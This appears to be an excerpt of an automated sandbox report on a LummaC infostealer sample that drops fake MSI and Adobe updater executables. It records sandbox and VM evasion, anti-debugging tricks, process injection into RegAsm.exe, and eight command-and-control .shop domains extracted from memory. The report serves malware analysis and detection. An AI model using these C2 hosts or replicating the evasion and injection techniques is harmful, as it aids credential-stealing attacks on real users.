                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-17837
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key enumerated: More than 145 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe TID: 6760Thread sleep count: 98 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe TID: 4460Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2492Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2492Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe TID: 4312Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe TID: 5852Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5780Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5804Thread sleep time: -90000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2088Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe TID: 428Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6612Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6636Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe TID: 2812Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2004Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00D52870 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,CreateDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error,0_2_00D52870
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00C8C82B FindFirstFileExW,GetLastError,0_2_00C8C82B
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeThread delayed: delay time: 922337203685477
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1644298203.00000000017C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}~"
                  Source: RegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWJ+
                  Source: RegAsm.exe, 00000011.00000002.2130384793.000000000153E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1625497117.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1625377908.0000000001570000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.0000000001760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&)0
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1878839470.0000000005FB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.1939197101.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2048327163.000000000145A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2048327163.000000000149C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1625841550.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1625917956.0000000001570000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP!
                  Source: RegAsm.exe, 0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1644298203.00000000017C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1626124846.0000000001570000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1626252203.0000000001570000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1878839470.0000000006002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1625585878.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1626031634.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1625688795.0000000001570000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Hides threads from debuggers
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeThread information set: HideFromDebuggerJump to behavior
                  Tries to detect sandboxes and other dynamic analysis tools (window names)
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00435B70 LdrInitializeThunk,7_2_00435B70
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00D3B380 LoadLibraryA,GetProcAddress,0_2_00D3B380
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: lumma1504[1].exe.0.dr, Angelo.csReference to suspicious API methods: Program.VirtualProtect(ref Eugene.SuperBook[0], Eugene.SuperBook.Length, 64u, ref oldProtect)
                  Source: lumma1504[1].exe.0.dr, Angelo.csReference to suspicious API methods: Program.WaitForSingleObject(Program.CreateRemoteThread(uint.MaxValue, 0u, 0u, ref Eugene.SuperBook[num], RemoteObjects.userBuffer, 0, ref WPA), uint.MaxValue)
                  Source: 0.2.2q45IEa3Ee.exe.e324c0.1.raw.unpack, ActiveApp.csReference to suspicious API methods: OpenProcess(33554432u, bInheritHandle: false, dwProcessId)
                  Allocates memory in foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeCode function: 6_2_02CE2549 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,6_2_02CE2549
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  LummaC encrypted strings found
                  Source: oRkIPIEeryat7GMgjkBr.exe, 00000006.00000002.1849470900.0000000003CE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wifeplasterbakewis.shop
                  Source: oRkIPIEeryat7GMgjkBr.exe, 00000006.00000002.1849470900.0000000003CE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: mealplayerpreceodsju.shop
                  Source: oRkIPIEeryat7GMgjkBr.exe, 00000006.00000002.1849470900.0000000003CE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bordersoarmanusjuw.shop
                  Source: oRkIPIEeryat7GMgjkBr.exe, 00000006.00000002.1849470900.0000000003CE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: suitcaseacanehalk.shop
                  Source: oRkIPIEeryat7GMgjkBr.exe, 00000006.00000002.1849470900.0000000003CE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: absentconvicsjawun.shop
                  Source: oRkIPIEeryat7GMgjkBr.exe, 00000006.00000002.1849470900.0000000003CE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pushjellysingeywus.shop
                  Source: oRkIPIEeryat7GMgjkBr.exe, 00000006.00000002.1849470900.0000000003CE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: economicscreateojsu.shop
                  Source: oRkIPIEeryat7GMgjkBr.exe, 00000006.00000002.1849470900.0000000003CE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: entitlementappwo.shop
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10E1008Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1055008Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 240008Jump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E93008
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11C3008
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe "C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeQueries volume information: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe VolumeInformationJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeQueries volume information: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeQueries volume information: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
